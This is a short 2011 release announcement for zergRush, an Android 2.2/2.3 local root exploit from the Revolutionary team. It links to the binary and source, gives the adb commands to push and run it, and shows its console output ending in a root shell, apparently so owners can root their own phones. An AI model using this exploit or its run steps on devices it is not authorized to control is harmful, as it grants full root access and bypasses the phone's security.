We would like to announce the public availability of the root exploit we use in Revolutionary, named zergRush.
This local root exploit should be Android-wide, across Froyo (2.2) and Gingerbread (2.3). However, this will not work on Android Honeycomb and up (3.0+).
Simultaneously, we're also releasing source code for this root exploit through our github.
The binary is available from here: zergRush binary.
The exploit source is available here: Revolutionary GitHub.
You will need adb shell to execute this exploit. We need shell permissions.
Push the binary onto /data/local/ and execute these commands in a shell:
$ chmod 755 /data/local/zergRush $ /data/local/zergRush
[**] Zerg rush - Android 2.2/2.3 local root [**] (C) 2011 Revolutionary. All rights reserved. [**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew. [+] Found a GingerBread ! 0x00017118[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ... [+] Zerglings caused crash (good news): 0x401219c4 0x0054[*] Researching Metabolic Boost ... [+] Speedlings on the go ! 0xafd260a9 0xafd39f9f[*] Poping 24 more zerglings[*] Sending 173 zerglings ... [+] Rush did it ! It's a GG, man ! [+] Killing ADB and restarting as root..enjoy!
# id uid=0 gid=0
Update 20-10-2011: zergRush has been updated to include some support for Sony Ericsson phones, updates for Samsung coming soon!
Update 22-10-2011: updates for Samsung phones, get the new download (or build yourself)